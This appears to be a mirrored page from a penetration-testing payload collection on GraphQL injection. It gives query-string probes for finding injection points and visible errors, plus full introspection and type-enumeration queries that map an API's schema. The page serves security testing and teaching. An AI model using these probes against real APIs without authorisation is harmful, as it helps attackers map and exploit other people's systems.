mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-11 22:15:26 +00:00
131 lines
1.9 KiB
Markdown
131 lines
1.9 KiB
Markdown
|
# GraphQL injection
|
||
|
|
||
|
GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
|
||
|
|
||
|
## Exploit
|
||
|
|
||
|
Identify an injection point
|
||
|
|
||
|
```
|
||
|
?param={__schema{types{name}}}
|
||
|
```
|
||
|
Check if errors are visible
|
||
|
|
||
|
```
|
||
|
?param={__schema}
|
||
|
?param={}
|
||
|
?param={thisdefinitelydoesnotexist}
|
||
|
```
|
||
|
|
||
|
Enumerate Database Schema with the following GraphQL query
|
||
|
|
||
|
```
|
||
|
fragment FullType on __Type {
|
||
|
kind
|
||
|
name
|
||
|
description
|
||
|
fields(includeDeprecated: true) {
|
||
|
name
|
||
|
description
|
||
|
args {
|
||
|
...InputValue
|
||
|
}
|
||
|
type {
|
||
|
...TypeRef
|
||
|
}
|
||
|
isDeprecated
|
||
|
deprecationReason
|
||
|
}
|
||
|
inputFields {
|
||
|
...InputValue
|
||
|
}
|
||
|
interfaces {
|
||
|
...TypeRef
|
||
|
}
|
||
|
enumValues(includeDeprecated: true) {
|
||
|
name
|
||
|
description
|
||
|
isDeprecated
|
||
|
deprecationReason
|
||
|
}
|
||
|
possibleTypes {
|
||
|
...TypeRef
|
||
|
}
|
||
|
}
|
||
|
fragment InputValue on __InputValue {
|
||
|
name
|
||
|
description
|
||
|
type {
|
||
|
...TypeRef
|
||
|
}
|
||
|
defaultValue
|
||
|
}
|
||
|
fragment TypeRef on __Type {
|
||
|
kind
|
||
|
name
|
||
|
ofType {
|
||
|
kind
|
||
|
name
|
||
|
ofType {
|
||
|
kind
|
||
|
name
|
||
|
ofType {
|
||
|
kind
|
||
|
name
|
||
|
ofType {
|
||
|
kind
|
||
|
name
|
||
|
ofType {
|
||
|
kind
|
||
|
name
|
||
|
ofType {
|
||
|
kind
|
||
|
name
|
||
|
ofType {
|
||
|
kind
|
||
|
name
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
query IntrospectionQuery {
|
||
|
__schema {
|
||
|
queryType {
|
||
|
name
|
||
|
}
|
||
|
mutationType {
|
||
|
name
|
||
|
}
|
||
|
types {
|
||
|
...FullType
|
||
|
}
|
||
|
directives {
|
||
|
name
|
||
|
description
|
||
|
locations
|
||
|
args {
|
||
|
...InputValue
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
```
|
||
|
|
||
|
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
|
||
|
|
||
|
```
|
||
|
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
|
||
|
```
|
||
|
|
||
|
## References
|
||
|
|
||
|
* [Introduction to GraphQL](https://graphql.org/learn/)
|
||
|
* [GraphQL Introspection](https://graphql.org/learn/introspection/)
|
||
|
|